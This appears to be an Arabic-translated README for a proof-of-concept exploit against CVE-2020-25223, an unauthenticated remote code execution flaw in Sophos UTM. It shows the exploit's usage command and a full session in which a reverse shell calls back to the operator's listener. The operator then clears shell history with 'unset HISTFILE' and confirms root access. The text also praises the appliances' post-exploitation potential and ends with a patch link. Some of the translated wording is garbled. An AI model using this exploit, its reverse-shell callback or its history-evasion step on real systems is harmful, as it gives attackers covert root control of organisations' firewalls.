
CVE-2020-25223
CVE-2020-25223 RCE PoC، يحصل على شيل عكسي. بدون مصادقة. تم تنفيذه بسرعة لأنه كان مطلوبًا لتوحيد بعض مغناطيس التهديدات.
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
#
غير مطبق هنا، فقط استخدم قالب nuclei.
تحتوي هذه الأجهزة على مترجم بايثون، وبيئة لينكس كاملة الميزات بالفعل. إمكانيات رائعة لمرحلة ما بعد الاستغلال.
أنا متأكد من أن شخصًا يهتم بالأمر يمكنه ملء هذا. Bitter (مجموعة فرعية من "تويتر الفريق الأزرق") سيفعل ذلك على الأرجح قريبًا. أعني، لا يمكن أن يكون من الصعب جدًا اكتشاف شيل عكسي غير مشفر يرسل إشارات من صندوق مدير التهديدات الموحد الخاص بك، أليس كذلك؟
شخص (من المفترض من Sophos) أرسل هذا، هو رابط الإصلاح الرسمي. قم بتحديث UTM الخاص بك. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
مرجع طرف ثالث (تفاصيل الثغرة): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
الشكاوى المباشرة إلى Sophos، الذين اعتقدوا بطريقة ما أن تمرير إدخال المستخدم إلى open() في Perl كان فكرة جيدة في القرن الحادي والعشرين.